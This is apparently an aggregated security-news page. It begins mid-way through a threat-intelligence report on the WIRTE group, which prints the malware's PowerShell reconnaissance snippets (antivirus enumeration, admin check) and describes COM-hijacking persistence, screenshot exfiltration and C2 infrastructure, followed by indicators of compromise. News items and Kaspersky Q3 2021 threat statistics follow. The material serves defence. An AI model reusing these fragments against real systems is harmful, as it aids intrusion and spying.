select volumeserialnumber List local disk drives ‘SELECT * FROM AntiVirusProduct’
$antivirusProduct = Get-WmiObject -Namespace
‘root\SecurityCenter2’ -Query $wmiQuery
if($antivirusProduct.displayName -eq ”){$ret= ‘N/A’}
else{$ret= $antivirusProduct.displayName} Get list of antivirus software installed New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsId
entity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuilt
inRole]::Administrator Check if current user has admin privileges Get-WmiObject win32_operatingsystem).caption) + ‘ x’+ ((Get-
WmiObject Win32_OperatingSystem).OSArchitecture).substring(0,2) Get operating system architecture

Additional long functions that we observed can be summarized as follows:

  • Function Get-ServiceStatus: checks for possible backdoors installed as services (MsDataSvc and NgcCtrlSvc), if the computer is part of a domain, and if the current user is a member of “Domain admins”.
  • Function Get-PersistenceStatus: checks for the registry keys added for COM hijacking.
  • Function Get-HotFixes: lists all hotfixes installed.
  • Screenshot: takes system screenshots and saves them to %AppData% before sending them to the C2 via a POST request.
Command and control

In our initial sample analysis, the C2 domain we observed was stgeorgebankers[.]com. After conducting pivots through malware samples, we were able to identify multiple C2 domains that date back to at least December 2019. These C2 domains were occasionally behind CloudFlare to obscure the real C2 IP address. Thanks to collaboration with our partners, we were able to gather some of the original C2 IP addresses, which allowed us to discover that the servers are hosted in Ukraine and Estonia.

Infrastructure overview

By looking for more machines presenting identical TLS certificates, we were able to identify additional domain names and IP addresses. Interestingly, the server mapped to kneeexercises[.]net listens for incoming HTTPS connections on several ports and uses common names seen on other C2 domains. For example, ports 2083 and 8443 had CN firstohiobank[.]com, and TCP port 2087 had a TLS certificate with the common name dentalmatrix[.]net. We observed use of these non-standard ports during some of the older intrusions, while the newer ones mostly use port 443.

Victimology

Our telemetry indicates that the threat actor has targeted a variety of verticals including diplomatic and financial institutions, government, law firms, military organizations, and technology companies. The affected entities are located in Armenia, Cyprus, Egypt, Jordan, Lebanon, Palestine, Syria and Turkey.

Threat actor assessment

We assess with high confidence that the intrusions discussed here are associated with the WIRTE threat actor group.

WIRTE used documents deploying Visual Basic Script (VBS), potentially delivered through spear phishing, decoys with Arabic content, occasionally associated with Palestinian matters.

We see the same theme being followed in the intrusions discussed in this report. Both old and new intrusions leveraged VBS and PowerShell in similar ways to stage additional tools and communicate with the C2.

Even though the latest intrusions are using TCP/443 over HTTPS in C2 communications, the oldest intrusions explored in this report used similar ports to those mentioned in the public post by Lab52, such as TCP 2096 and 2087. In addition, the C2 requests explored here and in the public post have similar PowerShell IEX command execution and sleep functions.

Old C2 request highlighting the status condition, IEX invocation and 60-100 sleep function

New C2 request highlighting the status condition, IEX invocation and 60-100 sleep function

The snippets above also show the custom user-agents. Although the old intrusions had them encoded, the intrusions explored in this report had them in plain text. In both cases the adversaries identified separate intrusions by changing the “rv” field.

The C2s in both cases were protected by Cloudflare, and the real VPSs were under ASNs primarily in Ukraine (e.g., ASN 201094).

In the Lab52 post, the author described the use of a defense evasion and living-off-the-land (LotL) technique using regsvr32.exe, whereas in the intrusions explored in this report, the threat actor used another LotL technique such as COM hijacking. In both cases, the working directory is %ProgramData%.

All in all, we believe that all these similarities are a strong indication that the attacks described in this report were conducted by the WIRTE threat actor.

We assess with low confidence that WIRTE is a subgroup under the Gaza Cybergang umbrella. Although the three subgroups we are tracking use entirely different TTPs, they all occasionally use decoys associated with Palestinian matters, which we haven’t seen commonly used by other threat actors, especially those operating in the Middle East region such as MuddyWater and Oilrig.

Conclusion and outlook

WIRTE operators use simple and rather common TTPs that have allowed them to remain undetected for a long period of time. If our assessment of associating WIRTE with Gaza Cybergang proves to be correct in the future, it may signal a change in the group’s motivation. Gaza Cybergang is politically motivated and therefore primarily targets governmental and political entities; it is unusual for such groups to target law firms and financial institutions. Despite the targeting of these latter spheres, the majority of victims still fall within the government and diplomatic categories.

WIRTE modified their toolset and how they operate to remain stealthy for a longer period of time. Living-off-the-land (LotL) techniques are an interesting new addition to their TTPs. This suspected subgroup of Gaza Cybergang used simple yet effective methods to compromise its victims with better OpSec than its suspected counterparts. Using interpreted language malware such as VBS and PowerShell scripts, unlike the other Gaza Cybergang subgroups, adds flexibility to update their toolset and avoid static detection controls.

Whether WIRTE is a new subgroup or an evolution of existing Gaza Cybergang subgroups, we see them expanding their presence further in cyberspace by using updated and stealthier TTPs. In the near future we expect them to continue compromising their victims using the TTPs discussed in this report.

Indicators of compromise Malicious documents and droppers ecaaab9e2fc089eefb6accae9750ac60 xls.اللائحة الجنیسیة a7802c9a4046edbcbe3f5a503de61867 doc.1803202155-تعمیم رقم 3a7425539f8853e7b89624890a5de25b saint george bankers & trust business offer.docx 5AE4505A5CA7235C842680C557D05383 slmgr.vbs B2F8CCE7B03E7AA70DAB4A5D377375B5 exhaustedq.txt 8ade05c4b4e98cc89fa09bd513ea1a99 kaspersky update agent.exe Class IDs in registry

HKCU:\Software\Classes\CLSID\{50236F14-2C02-4291-93AB-B5A80F9666B0}\LocalServer32
HKCU:\Software\Classes\CLSID\{14C34482-E07F-44CF-B261-385B616C54EC}\LocalServer32

File path

%AppData%\Temp\9127.tmp\9128.tmp\
%ProgramData%\

PDB paths

K:\Hacking\NgcCtrlSvc\NgcCtrlSvc\obj\Release\NgcCtrlSvc.pdb
K:\Hacking\Tools\MsDataSvc-v3\MsDataSvc\obj\Release\MsDataSvc.pdb

Domains and IPs

nutrition-information[.]org
Stgeorgebankers[.]com
Firstohiobank[.]com
allaccounting[.]ca
est-clinic[.]com
unitedfamilyhealth[.]net
pocket-property[.]com
kneeexercises[.]net
doctoressolis[.]com
omegaeyehospital[.]com
Healthyhabitsusa[.]com
niftybuysellchart[.]com
Dentalmatrix[.]net
91.211.89[.]33
91.203.6[.]27
45.129.96[.]174
45.129.97[.]207

Interpol Arrests Over 1,000 Cyber Criminals From 20 Countries; Seizes $27 Million

The Hacker News - 6 hodin 23 min zpět
A joint four-month operation coordinated by Interpol, the international criminal police organization, has culminated in the arrests of more than 1,000 cybercriminals and the recovery of $27 million in illicit proceeds. Codenamed "HAECHI-II," the crackdown enabled law enforcement units from across 20 countries, as well as Hong Kong and Macao, close 1,660 cases alongside blocking 2,350 bank
Kategorie: Hacking & Security

Anatomy of a Linux Ransomware Attack>

LinuxSecurity.com - 28 Listopad, 2021 - 13:00
Ransomware has dominated cybersecurity news headlines for the past decade, and for good reason. Through a combination of advanced encryption and effective extortion mechanisms, a ransomware attack can have devastating consequences for any victim including data loss, reputation harm, recovery costs and significant downtime.
Kategorie: Hacking & Security

Britové mají nový zákon pro internet věcí. Zakáže výchozí hesla u chytrých zařízení

Zive.cz - bezpečnost - 28 Listopad, 2021 - 11:45
Chytré vysavače, lednice a další spotřebiče jsou sice atraktivní, ale pojí se s nimi určité bezpečnostní riziko. Výrobci ne vždy produkty s internetem věcí dostatečně zabezpečují a britské vládě došla trpělivost. Přišla s novým zákonem, který definuje nové bezpečnostní prvky, které chytrá domovní ...
Kategorie: Hacking & Security

Italy's Antitrust Regulator Fines Google and Apple for "Aggressive" Data Practices

The Hacker News - 27 Listopad, 2021 - 07:34
Italy's antitrust regulator has fined both Apple and Google €10 million each for what it calls are "aggressive" data practices and for not providing consumers with clear information on commercial uses of their personal data during the account creation phase. The Autorità Garante della Concorrenza e del Mercato (AGCM) said "Google and Apple did not provide clear and immediate information on the
Kategorie: Hacking & Security

This New Stealthy JavaScript Loader Infecting Computers with Malware

The Hacker News - 27 Listopad, 2021 - 07:23
Threat actors have been found using a previously undocumented JavaScript malware strain that functions as a loader to distribute an array of remote access Trojans (RATs) and information stealers. HP Threat Research dubbed the new, evasive loader "RATDispenser," with the malware responsible for deploying at least eight different malware families in 2021. Around 155 samples of this new malware
Kategorie: Hacking & Security

Israel Bans Sales of Hacking and Surveillance Tools to 65 Countries

The Hacker News - 27 Listopad, 2021 - 07:22
Israel's Ministry of Defense has dramatically restricted the number of countries to which cybersecurity firms in the country are allowed to sell offensive hacking and surveillance tools to, cutting off 65 nations from the export list. The revised list, details of which were first reported by the Israeli business newspaper Calcalist, now only includes 37 countries, down from the previous 102:
Kategorie: Hacking & Security

Cloud Security: Don’t wait until your next bill to find out about an attack!

Sophos Naked Security - 26 Listopad, 2021 - 18:58
Cloud security is the best sort of altruism: you need to do it to protect yourself, but you help to protect everyone else at the same time.

Hackers Targeting Biomanufacturing Facilities With Tardigrade Malware

The Hacker News - 26 Listopad, 2021 - 14:20
An advanced persistent threat (APT) has been linked to cyberattacks on two biomanufacturing companies that occurred this year with the help of a custom malware loader called "Tardigrade." That's according to an advisory published by Bioeconomy Information Sharing and Analysis Center (BIO-ISAC) this week, which noted that the malware is actively spreading across the sector with the likely goal of
Kategorie: Hacking & Security

IT threat evolution in Q3 2021. Mobile statistics

Kaspersky Securelist - 26 Listopad, 2021 - 13:00

These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q3 2021:

  • 9,599,519 malware, adware and riskware attacks on mobile devices were prevented.
  • The largest share of all detected mobile threats accrued to RiskTool apps — 65.84%.
  • 676,190 malicious installation packages were detected, of which:
    • 12,097 packages were related to mobile banking Trojans;
    • 6,157 packages were mobile ransomware Trojans.
Quarterly highlights

The attackers became somewhat less active from the previous quarter — the number of mobile attacks dropped to 9.6 million. We have seen no new mass campaigns seeking to distribute any specific mobile malware family; nor were there any newsworthy events similar to what we had early into the COVID-19 pandemic.

Number of attacks targeting users of Kaspersky mobile solutions, Q1 2020 — Q3 2021 (download)

Yet Q3 brought us quite a few interesting finds at the same time. Thus, one of the modified WhatsApp builds, FMWhatsApp 16.80.0, contained the Trojan Triada along with an advertising SDK. The popularity of WhatsApp builds with extended functionality has secured this Trojan the fifth place in our malware ranking.

In Q3, new Trojan families emerged, distributed through Google Play. To those we already knew — Trojan.AndroidOS.Jocker and Trojan.AndroidOS.MobOk (signing the user up to paid subscriptions) and Trojan-Dropper.AndroidOS.Necro (downloading payload from the attack server) — two more were added. The first one includes scam apps of Trojan.AndroidOS.Fakeapp variety exploiting the theme of social payments to cajole money out of the user; the second one is the fast growing family Trojan-PSW.AndroidOS.Facestealer stealing Facebook account data.

Mobile banking Trojans were progressing, too. For example, a curious trick was employed by the family Trojan-Banker.AndroidOS.Fakecalls active in Korea: if the user tries to call the bank, the malware disconnects the real call and plays prerecorded operator’s responses stored in the Trojan’s body.

Mobile threat statistics

In Q3 2021, Kaspersky detected 676,190 malicious installation packages — 209,915 less than in the previous quarter and 445,128 less than in Q3 2020.

Number of detected malicious installation packages, Q3 2020 — Q3 2021 (download)

Distribution of detected mobile malware by type

Distribution of newly detected mobile malware by type, Q2 and Q3 2021 (download)

Two thirds of all threats detected in Q3 2021 came from RiskTool apps (65.84%), their share up by 27.37 p.p. The vast majority of detected apps of this type (91.02%) belonged to the family SMSreg.

Adware came in second with 21.51% — 12.58 p.p. down from the previous quarter. The malicious objects we most frequently encountered came from the families AdWare.AndroidOS.FakeAdBlocker (34.29% of all detected threats in the category), AdWare.AndroidOS.HiddenAd (30.66%) and AdWare.AndroidOS.MobiDash (8.81%).

Various Trojans are in third place (2.79%), their share down by 13.69 p.p. The worst offenders were from the families Boogr (48.88%), Piom (11.04%) and Hiddad (7.52%).

Top 20 mobile malware programs

Note that the malware rankings below exclude riskware and potentially unwanted software, such as RiskTool or adware.

Verdict %* 1 DangerousObject.Multi.Generic 33.02 2 Trojan-SMS.AndroidOS.Agent.ado 6.87 3 Trojan.AndroidOS.Whatreg.b 4.41 4 Trojan.AndroidOS.Triada.dq 3.85 5 Trojan.AndroidOS.Triada.ef 3.71 6 Trojan.AndroidOS.Hiddad.gx 3.70 7 DangerousObject.AndroidOS.GenericML 3.68 8 Trojan.AndroidOS.Agent.vz 3.63 9 Trojan-Downloader.AndroidOS.Necro.d 3.56 10 Trojan-Dropper.AndroidOS.Hqwar.bk 3.43 11 Trojan-SMS.AndroidOS.Fakeapp.b 3.35 12 Trojan.AndroidOS.MobOk.ad 3.13 13 Trojan.AndroidOS.Triada.el 2.76 14 Trojan-Downloader.AndroidOS.Agent.kx 2.21 15 Trojan-Dropper.AndroidOS.Hqwar.gen 1.74 16 Trojan-Downloader.AndroidOS.Gapac.e 1.71 17 Trojan-Dropper.AndroidOS.Agent.rp 1.66 18 Exploit.AndroidOS.Lotoor.be 1.66 19 Trojan.AndroidOS.Fakeapp.dn 1.64 20 Trojan-SMS.AndroidOS.Prizmes.a 1.53

* Unique users attacked by this malware as a percentage of all attacked users of Kaspersky mobile solutions.

The first ten threats from the Top 20 in Q3 are those already featured in our rankings earlier.

First place as usual went to DangerousObject.Multi.Generic (33.02%), the verdict we use for malware detected with cloud technology. This technology comes into play whenever the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is essentially how the latest malware types are detected.

The Trojan-SMS.AndroidOS.Agent.ado malware — sender of text messages to short premium-rate numbers — has climbed from third to second place (6.87%).

Third place was taken by Trojan.AndroidOS.Whatreg.b (4.41%) allowing attackers to use the victim’s phone number to register new WhatsApp accounts controlled by them alone.

The Triada family Trojans are fourth, fifth and thirteenth in our ranking. They download and execute other malware on the infected device. Triada’s victims often suffer from the abovementioned Trojan.AndroidOS.Whatreg.b, as well as Trojan-Downloader.AndroidOS.Necro.d (9th, 3.56%), Trojan-Downloader.AndroidOS.Gapac.e (16th, 1.71%) and Trojan-Dropper.AndroidOS.Agent.rp (17th, 1.66%), all of which likely belong to the same campaign.

Trojan.AndroidOS.Hiddad.gx (3.70%), a source of annoying ads, rose to sixth position.

Seventh place was taken by DangerousObject.AndroidOS.GenericML (3.68%). These verdicts are assigned to files recognized as malicious by our machine-learning systems.

The malware Trojan.AndroidOS.Agent.vz (3.63%) — similarly to Triada, a link in the infection chain of various Trojans — dropped into eighth.

Tenth and fifteenth places were taken by members of the family Trojan-Dropper.AndroidOS.Hqwar — a dropper used to unpack and execute various banking Trojans on the target device.

The newcomer Trojan-SMS.AndroidOS.Fakeapp.b came eleventh (3.35%). This mobile malware can text and call preset numbers, show ads, and conceal its icon. Most users attacked by the Trojan are from Russia.

Trojan.AndroidOS.MobOk.ad (3.13%) that signs users up to paid services dropped into twelfth.

The adware downloader Trojan-Downloader.AndroidOS.Agent.kx (2.21%) rose to fourteenth.

Exploit.AndroidOS.Lotoor.be (1.66%), an exploit used for elevating privileges on the device to superuser level, came eighteenth. Members of this family often come bundled with other widespread malware like Triada and Necro.

Trojan.AndroidOS.Fakeapp.dn (1.64%), another new arrival, takes the nineteenth place. This is a scam app exploiting the theme of social payments: it opens fake pages prompting users to provide their personal data and pay a fee to receive money.

The Top 20 is rounded out by Trojan-SMS.AndroidOS.Prizmes.a (1.53%), which is preinstalled on some Android devices under the guise of Sound Recorder. The Trojan texts preset numbers reporting the events taking place on the device (e.g., smartphone power on).

Geography of mobile threats

Map of infection attempts by mobile malware, Q3 2021 (download)

Top 10 countries by share of users attacked by mobile malware

Country* %** 1 Iran 20.14 2 Saudi Arabia 17.84 3 China 17.07 4 Algeria 16.73 5 India 15.33 6 Malaysia 13.63 7 Ecuador 11.52 8 Brazil 11.15 9 Bangladesh 10.81 10 Nigeria 10.81

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile security solutions (under 10,000).
** Share of unique users attacked as a percentage of all users of Kaspersky mobile security solutions in the country.

In Q3 2021, the infected systems percentage ranking is led by the same countries as in Q2; the most popular threats in these countries are likewise the same. First place went to Iran (20.14%), its prevailing threat represented by annoying adware modules of the families AdWare.AndroidOS.Notifyer and AdWare.AndroidOS.Fyben.

In Saudi Arabia, which came second with 17.84%, AdWare.AndroidOS.HiddenAd and AdWare.AndroidOS.FakeAdBlocker adware were the most common issue.

China (17.07%) came third with Trojan.AndroidOS.Najin.a as its most widely spread Trojan.

Mobile banking Trojans

We detected 12,097 mobile banking Trojan installers during the reporting period — 12,507 less from Q2 and 22,813 less year on year.

The largest contributors to these figures were the families Trojan-Banker.AndroidOS.Agent (46.72% of all banking Trojans detected), Trojan-Banker.AndroidOS.Bian (16.18%) and Trojan-Banker.AndroidOS.Anubis (8.20%).

Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2020 – Q3 2021 (download)

Ten most common mobile bankers

Verdict %* 1 Trojan-Banker.AndroidOS.Anubis.t 16.77 2 Trojan-Banker.AndroidOS.Svpeng.q 11.17 3 Trojan-Banker.AndroidOS.Bian.f 9.08 4 Trojan-Banker.AndroidOS.Agent.eq 6.83 5 Trojan-Banker.AndroidOS.Asacub.ce 6.22 6 Trojan-Banker.AndroidOS.Agent.ep 5.17 7 Trojan-Banker.AndroidOS.Hqwar.t 3.53 8 Trojan-Banker.AndroidOS.Agent.cf 3.05 9 Trojan-Banker.AndroidOS.Bian.h 2.83 10 Trojan-Banker.AndroidOS.Svpeng.t 2.81

* Unique users attacked by this malware as a percentage of all Kaspersky mobile security solution users who encountered banking threats.

In Q3 2021, first place in our top mobile bankers ranking was taken by the Anubis family’s Trojan-Banker.AndroidOS.Anubis.t (16.77%). In second (11.17%) and tenth (2.81%) are bankers of the Svpeng family. Bian family bankers are in third (9.08%) and ninth (2.83%).

Geography of mobile banking threats, Q3 2021 (download)

Top 10 countries by share of users attacked by mobile banking Trojans

Country* %** 1 Spain 1.02 2 Austria 0.44 3 Croatia 0.43 4 Germany 0.33 5 Japan 0.26 6 Turkey 0.22 7 Portugal 0.20 8 Norway 0.20 9 China 0.18 10 Switzerland 0.14

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile security solutions (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Spain has the largest share of unique users attacked by mobile financial threats in Q3 2021 (1.02%). The prevalent banker detected in this country is Trojan-Banker.AndroidOS.Bian.h (33.55% of all banking Trojans detected). Austria (0.44%) is second with another Bian family representative — Trojan-Banker.AndroidOS.Bian.f (96.02%) — leading by a mile. Croatia (0.43%) is third with Bian.f (97.59%) as its most widely spread banker.

Mobile ransomware Trojans

In Q3 2021, we detected 6,157 installation packages for mobile ransomware Trojans — an increase of 2,534 from the previous quarter and 635 more than in Q3 2020.

Number of mobile ransomware installers detected by Kaspersky, Q3 2020 — Q3 2021 (download)

Top 10 most common mobile ransomware

Verdict %* 1 Trojan-Ransom.AndroidOS.Pigetrl.a 51.00 2 Trojan-Ransom.AndroidOS.Rkor.ax 10.43 3 Trojan-Ransom.AndroidOS.Rkor.bb 8.58 4 Trojan-Ransom.AndroidOS.Rkor.az 5.31 5 Trojan-Ransom.AndroidOS.Rkor.bc 4.64 6 Trojan-Ransom.AndroidOS.Rkor.ay 4.49 7 Trojan-Ransom.AndroidOS.Small.as 3.92 8 Trojan-Ransom.AndroidOS.Rkor.ba 2.30 9 Trojan-Ransom.AndroidOS.Rkor.au 1.72 10 Trojan-Ransom.AndroidOS.Rkor.aw 1.41

* Unique users attacked by the malware as a percentage of all Kaspersky mobile security solution users attacked by ransomware Trojans.

Same as in Q2, this time the ransomware Trojans ranking is led by Trojan-Ransom.AndroidOS.Pigetrl.a — 51% of all attacked users. Most of its attacks (92%) were targeting users from Russia.

Geography of mobile ransomware Trojans, Q3 2021 (download)

Top 10 countries by share of users attacked by mobile ransomware Trojans

Country* %** 1 Kazakhstan 0.57 2 Sweden 0.22 3 Kyrgyzstan 0.21 4 Morocco 0.06 5 China 0.06 6 Saudi Arabia 0.05 7 Uzbekistan 0.04 8 Algeria 0.04 9 Pakistan 0.02 10 Egypt 0.02

* Excluded from the rating are countries with relatively few users of Kaspersky mobile security solutions (under 10,000).
** Unique users attacked by ransomware Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Countries leading by number of users attacked by mobile ransomware Trojans are the same as in Q2: Kazakhstan (0.57%), Sweden (0.22%) and Kyrgyzstan (0.21%). In all three the Trojan-Ransom.AndroidOS.Rkor family Trojans were the most common threat.

IT threat evolution in Q3 2021. PC statistics

Kaspersky Securelist - 26 Listopad, 2021 - 13:00

These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q3 2021:

  • Kaspersky solutions blocked 1,098,968,315 attacks from online resources across the globe.
  • Web Anti-Virus recognized 289,196,912 unique URLs as malicious.
  • Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 104,257 unique users.
  • Ransomware attacks were defeated on the computers of 108,323 unique users.
  • Our File Anti-Virus detected 62,577,326 unique malicious and potentially unwanted objects.
Financial threats Financial threat statistics

In Q3 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 104,257 unique users.

Number of unique users attacked by financial malware, Q3 2021 (download)

Geography of financial malware attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country.

Geography of financial malware attacks, Q3 2021 (download)

Top 10 countries by share of attacked users

Country* %** 1 Turkmenistan 5.4 2 Tajikistan 3.7 3 Afghanistan 3.5 4 Uzbekistan 3.0 5 Yemen 1.9 6 Kazakhstan 1.6 7 Paraguay 1.6 8 Sudan 1.6 9 Zimbabwe 1.4 10 Belarus 1.1

* Excluded are countries with relatively few Kaspersky product users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country.

Top 10 banking malware families

Name Verdicts %* 1 Zbot Trojan.Win32.Zbot 17.7 2 SpyEye Trojan-Spy.Win32.SpyEye 17.5 3 CliptoShuffler Trojan-Banker.Win32.CliptoShuffler 9.6 4 Trickster Trojan.Win32.Trickster 4.5 5 RTM Trojan-Banker.Win32.RTM 3.6 6 Nimnul Virus.Win32.Nimnul 3.0 7 Gozi Trojan-Banker.Win32.Gozi 2.7 8 Danabot Trojan-Banker.Win32.Danabot 2.4 9 Tinba Trojan-Banker.Win32.Tinba 1.5 10 Cridex Backdoor.Win32.Cridex 1.3

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

In Q3, the family ZeuS/Zbot (17.7%), as usual, became the most widespread family of bankers. Next came the SpyEye (17.5%) family, whose share doubled from 8.8% in the previous quarter. The Top 3 was rounded out by the CliptoShuffler family (9.6%) — one position and just 0.3 p.p. down. The families Trojan-Banker.Win32.Gozi (2.7%) and Trojan-Banker.Win32.Tinba (1.5%) have made it back into the Top 10 in Q3 — seventh and ninth places, respectively.

Ransomware programs Quarterly trends and highlights Attack on Kaseya and the REvil story

In early July, the group REvil/Sodinokibi attempted an attack on the remote administration software Kaseya VSA, compromising several managed services providers (MSP) who used this system. Thanks to this onslaught on the supply chain, the attackers were able to infect over one thousand of the compromised MSPs’ client businesses. REvil’s original $70 million ransom demand in exchange for decryption of all the users hit by the attack was soon moderated to 50 million.

Following this massive attack, law enforcement agencies stepped up their attention to REvil, so by mid-July the gang turned off their Trojan infrastructure, suspended new infections and dropped out of sight. Meanwhile, Kaseya got a universal decryptor for all those affected by the attack. According to Kaseya, it “did not pay a ransom — either directly or indirectly through a third party”. Later it emerged that the company got the decryptor and the key from the FBI.

But already in the first half of September, REvil was up and running again. According to the hacking forum XSS, the group’s former public representative known as UNKN “disappeared”, and the malware developers, failing to find him, waited awhile and restored the Trojan infrastructure from backups.

The arrival of BlackMatter: DarkSide restored?

As we already wrote in our Q2 report, the group DarkSide folded its operations after their “too high-profile” attack on Colonial Pipeline. And now there is a “new” arrival known as BlackMatter, which, as its members claim, represents the “best” of DarkSide, REvil and LockBit.

From our analysis of the BlackMatter Trojan’s executable we conclude that most likely it was built using DarkSide’s source codes.

Q3 closures
  • Europol and the Ukrainian police have arrested two members of an unnamed ransomware gang. The only detail made known is that the ransom demands amounted to €5 to €70 million.
  • Following its attack on Washington DC’s Metropolitan Police Department, the group Babuk folded (or just suspended) its operations and published an archive containing the Trojan’s source code, build tools and keys for some of the victims.
  • At the end of August, Ragnarok (not to be confused with RagnarLocker) suddenly called it a day, deleted all their victims’ info from their portal and published the master key for decryption. The group gave no reasons for this course of action.
Exploitation of vulnerabilities and new attack methods
  • The group HelloKitty used to distribute its ransomware by exploiting the vulnerability CVE-2019-7481 in SonicWall gateways.
  • Magniber and Vice Society penetrated the target systems by exploiting the vulnerabilities from the PrintNightmare family (CVE-2021-1675, CVE-2021-34527, CVE-2021-36958).
  • The group LockFile exploited ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) to penetrate the victim’s network; for lateral expansion they relied on the new PetitPotam attack that gained control of the domain controller.
  • The group Conti also used ProxyShell exploits for its attacks.
Number of new ransomware modifications

In Q3 2021, we detected 11 new ransomware families and 2,486 new modifications of this malware type.

Number of new ransomware modifications, Q3 2020 — Q3 2021 (download)

Number of users attacked by ransomware Trojans

In Q3 2021, Kaspersky products and technologies protected 108,323 users from ransomware attacks.

Number of unique users attacked by ransomware Trojans, Q3 2021 (download)

Geography of ransomware attacks

Geography of attacks by ransomware Trojans, Q3 2021 (download)

Top 10 countries attacked by ransomware Trojans

Country* %** 1 Bangladesh 1.98 2 Uzbekistan 0.59 3 Bolivia 0.55 4 Pakistan 0.52 5 Myanmar 0.51 6 China 0.51 7 Mozambique 0.51 8 Nepal 0.48 9 Indonesia 0.47 10 Egypt 0.45

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country.

Top 10 most common families of ransomware Trojans Name Verdicts %* 1 Stop/Djvu Trojan-Ransom.Win32.Stop 27.67% 2 (generic verdict) Trojan-Ransom.Win32.Crypren 17.37% 3 WannaCry Trojan-Ransom.Win32.Wanna 11.84% 4 (generic verdict) Trojan-Ransom.Win32.Gen 7.78% 5 (generic verdict) Trojan-Ransom.Win32.Encoder 5.58% 6 (generic verdict) Trojan-Ransom.Win32.Phny 5.57% 7 PolyRansom/VirLock Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom 2.65% 8 (generic verdict) Trojan-Ransom.Win32.Agent 2.04% 9 (generic verdict) Trojan-Ransom.MSIL.Encoder 1.07% 10 (generic verdict) Trojan-Ransom.Win32.Crypmod 1.04%

* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware.

Miners Number of new miner modifications

In Q3 2021, Kaspersky solutions detected 46,097 new modifications of miners.

Number of new miner modifications, Q3 2021 (download)

Number of users attacked by miners

In Q3, we detected attacks using miners on the computers of 322,131 unique users of Kaspersky products worldwide. And while during Q2 the number of attacked users gradually decreased, the trend was reversed in July and August 2021. With slightly over 140,000 unique users attacked by miners in July, the number of potential victims almost reached 150,000 in September.

Number of unique users attacked by miners, Q3 2021 (download)

Geography of miner attacks

Geography of miner attacks, Q3 2021 (download)

Top 10 countries attacked by miners

Country* %** 1 Ethiopia 2.41 2 Rwanda 2.26 3 Myanmar 2.22 4 Uzbekistan 1.61 5 Ecuador 1.47 6 Pakistan 1.43 7 Tanzania 1.40 8 Mozambique 1.34 9 Kazakhstan 1.34 10 Azerbaijan 1.27

* Excluded are countries with relatively few users of Kaspersky products (under 50,000).
** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country.

Vulnerable applications used by cybercriminals during cyberattacks Quarter highlights

Much clamor was caused in Q3 by a whole new family of vulnerabilities in Microsoft Windows printing subsystem, one already known to the media as PrintNightmare: CVE-2021-1640, CVE-2021-26878, CVE-2021-1675, CVE-2021-34527, CVE-2021-36936, CVE-2021-36947, CVE-2021-34483. All those vulnerabilities allow for local escalation of privileges or remote execution of commands with system rights and, as they require next to nothing for exploitation, they are often used by popular mass infection tools. To fix them, several Microsoft patches are required.

The vulnerability known as PetitPotam proved no less troublesome. It allows an unprivileged user to take control of a Windows domain computer — or even a domain controller — provided the Active Directory certificate service is present and active.

In the newest OS Windows 11, even before its official release, the vulnerability CVE-2021-36934 was detected and dubbed HiveNightmare/SeriousSam. It allows an unprivileged user to copy all the registry threads, including SAM, through the shadow copy mechanism, potentially exposing passwords and other critical data.

In Q3, attackers greatly favored exploits targeting the vulnerabilities ProxyToken, ProxyShell and ProxyOracle (CVE-2021-31207, CVE-2021-34473, CVE-2021-31207, CVE-2021-33766, CVE-2021-31195, CVE-2021-31196). If exploited in combination, these open full control of mail servers managed by Microsoft Exchange Server. We already covered similar vulnerabilities — for instance, they were used in a HAFNIUM attack, also targeting Microsoft Exchange Server.

As before, server attacks relying on brute-forcing of passwords to various network services, such as MS SQL, RDP, etc., stand out among Q3 2021 network threats. Attacks using the exploits EternalBlue, EternalRomance and similar are as popular as ever. Among the new ones is the grim vulnerability enabling remote code execution when processing the Object-Graph Navigation Language in the product Atlassian Confluence Server (CVE-2021-26084) often used in various corporate environments. Also, Pulse Connect Secure was found to contain the vulnerability CVE-2021-22937, which however requires the administrator password for it to be exploited.

Statistics

As before, exploits for Microsoft Office vulnerabilities are still leading the pack in Q3 2021 (60,68%). These are popular due to the large body of users, most of whom still use older versions of the software, thus making the attackers’ job much easier. The share of Microsoft Office exploits increased by almost 5 p.p. from the previous quarter. Among other things, it was due to the fact that the new vulnerability CVE-2021-40444 was discovered in the wild, instantly employed to compromise user machines. The attacker can exploit it by using the standard functionality that allows office documents to download templates, implemented with the help of special ActiveX components. There is no proper validation of the processed data during the operation, so any malicious code can be downloaded. As you are reading this, the relevant security update is already available.

The way individual Microsoft Office vulnerabilities are ranked by the number of detections does not change much with time: the first positions are still shared by CVE-2018-0802 and CVE-2017-8570, with another popular vulnerability CVE-2017-11882 not far behind. We already covered these many times — all the above-mentioned vulnerabilities execute commands on behalf of the user and infect the system.

Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2021 (download)

